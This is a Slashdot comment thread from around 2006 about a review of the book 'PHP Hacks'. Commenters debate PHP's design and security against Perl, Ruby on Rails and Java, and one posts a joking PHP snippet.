Re:I'm not a php/perl guru, but (2, Informative)

FooAtWFU (699187) | more than 8 years ago | (#15663390)

It's all true. Now, I know Perl has its own set of issues, and as far as speed is concerned you can't expect plain vanilla CGI to favorably compare to decently cached PHP in a DSO module for Apache (though you CAN run spiffy-fast with things like mod_perl or FastCGI, especially if you're willing to leave Apache for lighttpd like the Ruby on Rails people like). And of course you can write some really incoherent stupid code in Perl, certainly -- especially when you're not smart enough to realize there's something nice in CPAN or your standard Perl distribution that already does what you're asking. But you can also write simple, clean, beautiful, elegant code to do amazing things (and I will always love my hash of anonymous coderefs :)

PHP is the Windows of web programming. It's simple (on the surface), extremely prevalent, trivial to get started with... and then it's inflexible, promotes droolingly bad design decisions, and has a security layer full of holes.

Re:I'm not a php/perl guru, but (0)

Anonymous Coward | more than 8 years ago | (#15663538)

promotes droolingly bad design decisions, and has a security layer full of holes.

RUBBISH! People who know what they're doing with web development will write solid code in any language they care to learn. All of the critisms in the main linked document are frustratingly accurate but other critisisms such as yours are unwarranted. I've never used register_globals in PHP, there's never been XSS or session hijacking vulns in my apps, never used add_slashes... Given that the biggest competitor to PHP is ASP.NET, I'm glad it's so popular!

Re:I'm not a php/perl guru, but (2, Informative)

FooAtWFU (699187) | more than 8 years ago | (#15663597)

Well, of course you can write solid code in PHP. You just need to plug all the security holes yourself, explicitly. I, for one, would like to have prepared statements deal with escaping parameters, not have to worry about the fourth parameter of mail() turning my form into a spam machine... and if you've never used add_slashes - are you relying on magic quotes? Is that script of yours supposed to be portable? Sorry.

Re:I'm not a php/perl guru, but (0)

Anonymous Coward | more than 8 years ago | (#15663839)

I meant magic quotes, even tho I do tend towards dba/sqlite over bloat. Besides which you should be validating and escaping all user supplied data. That's rule 1 of web programming no matter what language you're using. I've used the same basic quote lib for Postgres/MySQL for around 5 years now however all my forms are keyed so automated injection attemps never even invoke the db layer.

It's correct, but but not complete (2, Insightful)

MacFanMR (870166) | more than 8 years ago | (#15663664)

All of those observations are true, but that doesn't mean you shouldn't use PHP. As with any tool, you must consider the user, their skill level, and the project requirements when making your decision.

Many of PHP's inconsistencies stem from the fact that it is an open source language. While it has likely changed now, many functions were accepted into the source without anyone ensuring a consistent naming scheme, parameter order or behavior. To maintain backward compatibility for what is now a very large user base, this cannot be easily changed at this point.

Several of the examples of redundant functions are not redundant at all. The escaping functions relate to the specific database they are escaping the data for. Oracle requires that things be escaped differently than MySQL, a single function wouldn't work.

That aside, there are many functions that perform tasks you could accomplish in other ways. For instance, finding if a string contains another string. I might use strpos('mystring', 'my') but there is also a function that is named specifically for the purpose of finding whether a string contains another string. That function would return a simple true/false while my example would actually return the position of the substring or false but I can interpret it to tell me what I need to know. My guess was that the extra functions are an attempt to make the language accessible to less experienced programmers. For me, I would rather write my own functions as needed than muddy the PHP parser with extra functions, but I'm not on the development team so it's not my decision to make.

PHP has namespaces though they are not formal and therefore not as efficient. For example, all the MySQL functions begin with mysql_ and pSpell functions begin with pspell_. Starting with PHP5 and full OOP support, they now have class based namespaces like SOAPServer::addFunction(). Each namespace regardless of type, represents a package compiled into PHP. Though the default compile comes with many packages installed, you can decrease the number of functions by compiling without support for DBs and other packages you don't need. This would decrease the number of functions PHP is parsing for (correct me if I'm wrong on this.)

Perl may be compact, but if you notice in the examples, for someone who isn't familiar with Perl, the code provided wouldn't be immediately understandable, and Perl code can be optimized and obfuscated even more than that.

On the flip side is Java, which at its core is compact, but with the Java standard library of methods, there are nearly unlimited numbers of methods to do just about anything and everything you could ever think of. Add to that the frameworks that exist: struts, beans, servlets, jsp... just to scratch the surface and we find that Java is infinitely flexible and powerful. For those that know it, it is probably the greatest thing ever, but for someone starting out, it is incredibly overwhelming.

If you use PHP and it fulfills your needs, then keep using it. If you run into a lot of limitations or frustrations because it can't do things you could do in xyz language, or because you are building projects that become difficult to maintain due to their scale, then you might want to explore other options. Ruby/Perl/Java/ASP/Cold Fusion has its pros and cons as much as PHP or anything else. It's up to you as the professional to evaluate your specific needs and options and make the right decision for you.

Michael

That's nonsense (1)

Estanislao Martnez (203477) | more than 8 years ago | (#15664139)

Many of PHP's inconsistencies stem from the fact that it is an open source language. While it has likely changed now, many functions were accepted into the source without anyone ensuring a consistent naming scheme, parameter order or behavior. To maintain backward compatibility for what is now a very large user base, this cannot be easily changed at this point.

Even if we granted that the functions can't be easily changed, that's got nothing to do with whether it's open source or not. But of course, I'm not willing to grant that it can't be easily changed. Make the next major version include all the functions as modules you need to load, and perhaps provide an utility to tell upgraders which files require which modules.

Several of the examples of redundant functions are not redundant at all. The escaping functions relate to the specific database they are escaping the data for. Oracle requires that things be escaped differently than MySQL, a single function wouldn't work.

That's a terrible example. What this means is simply that the language doesn't have decent database abstraction facilities (and in fact, PHP is infamous for precisely this). In a well designed database access framework, you specify which kind of database you're connecting to, and the framework picks the appropriate methods for doing all the database flavor-specific stuff. Or in other words, you tell the system "connect to this database" and "escape this string for this connection," and the system figures out, based on the kind of database, what to do.

Re:That's nonsense (0)

Anonymous Coward | more than 8 years ago | (#15664246)

That's not entirely true: http://www.php.net/pdo [php.net]

Re:That's nonsense (1)

Estanislao Martnez (203477) | more than 8 years ago | (#15664442)

From your link:

PDO ships with PHP 5.1, and is available as a PECL extension for PHP 5.0; PDO requires the new OO features in the core of PHP 5, and so will not run with earlier versions of PHP.

...

RoR for PHP Projects (2, Interesting)

Space_Nerd (255762) | more than 8 years ago | (#15663469)

Has anyone tried the CakePHP package? It's supposed to be similar to RoR, but i'm unable to deploy a Ruby based solution at work due to stupid policys (like: everybody knows php, nobody knows ruby... pfff). If not, are there any rails-like project for PHP anyone care to recommend?

Thanks!

Re:RoR for PHP Projects (1)

killjoe (766577) | more than 8 years ago | (#15663534)

Rails is great. Not just for web sites but for all types of programming because it really encourages you to use best practices like unit testing, MVC etc. Capistrano and migrations also rock.

The only problem with rails is that ruby is not ideal for windows, the interpreter has threading issues, you can't write COM objects with it, and it's the slowest of the big scripting languages.

Having said all that none of the rails clones come even close. Every language has now attempted to make a rails clone and they have all concentrated on activerecord. Activerecord is great but it's only one tiny part of rails.

Rails isn't perfect, they really should come up with a better way to integrate multiple rails applications on the same server. There should be a better way to carry your gems around and share them not only with other rails apps but other programs too, they need a report engine desparately, they need a really good message queue, more solid cached records etc. The community is active though and I am sure all those problems will be solved pretty soon. Cached records are already being worked on for example.

Re:RoR for PHP Projects (1)

lucas teh geek (714343) | more than 8 years ago | (#15663657)

We're using it for a project at the moment. seems like every problem we run into isnt a problem in rail, but dont worry, there are plently of ugly, unoffical hacks, to get most things to work some of the time.

grumbles at the stupid people who made us use cakephp because they knew php and didnt want to learn something new

Re:RoR for PHP Projects (1)

galaga79 (307346) | more than 8 years ago | (#15664125)

I am currently porting a classic PHP site to CakePHP and I must say the framework makes life a lot easier. It takes some getting use to MVC design practices (eg a view doesn't request data, it is given data) and some of the documentation is a bit unclear but once you get into the swing of things it's a rapid way to develop sites.

Despite what? (2, Insightful)

JudgeDredd (561957) | more than 8 years ago | (#15663518)

The book was published by O'Reilly Media in December of 2005. Despite its title, PHP Hacks: Tips & Tools for Creating Dynamic Websites

Umm, despite its title, what?

PHP Popularity (2, Informative)

hotfireball (948064) | more than 8 years ago | (#15663557)

"Everything populair is wrong" -- Oscar Wilde

Re:PHP Popularity (2, Funny)

Vexorian (959249) | more than 8 years ago | (#15663592)

Oscar Wilde is popular then his statement is wrong

Re:PHP Popularity (0)

Anonymous Coward | more than 8 years ago | (#15663653)

Don't worry. He's not.

Re:PHP Popularity (1)

hotfireball (948064) | more than 8 years ago | (#15663757)

Oscar Wilde isn't "everything". PHP is a thing.

blame the coder, not the language (3, Insightful)

Anonymous Coward | more than 8 years ago | (#15663615)

Yes, PHP is relatively easy to begin coding in, what with its fairly forgiving variable typing (or what some would call non-typing) and its babysitting of memory. I would even agree that PHP tends to attract more bozos and wannabes for this very reason. However, PHP is, and continues to be the most widely used non M$ language for open sourced web applications. This is because it works. Sure, PHP allows sloppy coding, but it also allows clean and well written code. PHP is a lightweight, nimble, comprehendable scripting language that is very well suited for its intended environment: the web.

-Peter

Save $11.08! (0)

Anonymous Coward | more than 8 years ago | (#15663640)

Save yourself $11.08 by buying the book here: PHP Hacks [amazon.com] . And if you use the "secret" A9.com discount [amazon.com] , you can save an extra 1.57%! That's a total savings of $11.38, or 38.56%!

Free PHP bashing (3, Insightful)

Beuno (740018) | more than 8 years ago | (#15663930)

I understand that PHP has a very solid newbie user base, but let's not forget monstrous sites like Digg and Wikipedia run on PHP + MySQL

Re:Free PHP bashing (0, Troll)

WilliamSChips (793741) | more than 8 years ago | (#15664113)

Wikipedia is good despite its poor language choice. Digg sucks no matter which way you go.

Wikipedia is a bad example. (0)

Anonymous Coward | more than 8 years ago | (#15664377)

The reason wikipedia is broken to various degrees most of the time is because its built in PHP. The reason they have to constantly beg for money to buy WAY too many servers is because its built in PHP. Choosing any reasonable language would have made it scale far better with much less hardware.

Uhhhh (2, Insightful)

Anonymous Coward | more than 8 years ago | (#15664152)

Did any of you failed PHP programmers ever think maybe its your own ability to write well formed code?

Since many of the largest and most complicated sites in the world use PHP flawlessly, I think its just your amateurish programming style requiring a compiler to bitch slap you till you do the right thing. That's like blaming the razor blade company when you finally relive us PHP programmers from having to listen to your bitching by committing suicide. Just because you have the freedom, doesnt mean you shouldn't exercise self control.

Incidentally, if you use PHP for a few months you will find the names to functions coming pretty automatically. You could also grab a copy of an IDE like Zend Studio which shows a list of possible function endings, descriptions and a param summary (even for user defined functions, respecting namespace and supporting classes).

Ruby Makes PHP Obsolete (0, Offtopic)

anidiot (821082) | more than 8 years ago | (#15664338)

It's time to move on to Rails, folks.

Most posts offtopic (3, Funny)

linvir (970218) | more than 8 years ago | (#15664424)

PHP seems to be one of those red-button topics on Slashdot. If the word even appears in the text of the story, the topic at hand is dropped entirely in favour of having a big wanking session [linuxvirus.net] and patting each other on the back for knowing a 'superior' language, or for having been into Linux 'before it was cool', or whatever the general topic happens to be.

And not only is this stuff offtopic, it's also just so painfully redundant. I swear, that Slashdot story generator page [bbspot.com] from a while back was pretty impressive, but I'm starting to think maybe I could cook up a Slashdot comment generator as an add-on.

// Wooooooooo! Watch out for magic quotes!
if(get_magic_quotes_gpc())
{
echo 'FUK U U FUKKEN DIKKED WEBHOST I AIN RUNNEN NO FUKKEN SITE WIV NO FUKKEN MAGIC QUOTES' . "\n";
exit;
}

// And now for a basic example of some comment generation
if (strpos($story, 'DRM'))
{
echo 'DRM is bad.' . "\n";
while (strrpos(date('l'), 'y') === 0) // what a FUKKEN MESS111
{
echo 'Yes, DRM is very, very bad indeed.' . "\n";
}
}
Load More Comments
Slashdot Login

Need an Account?

Forgot your password?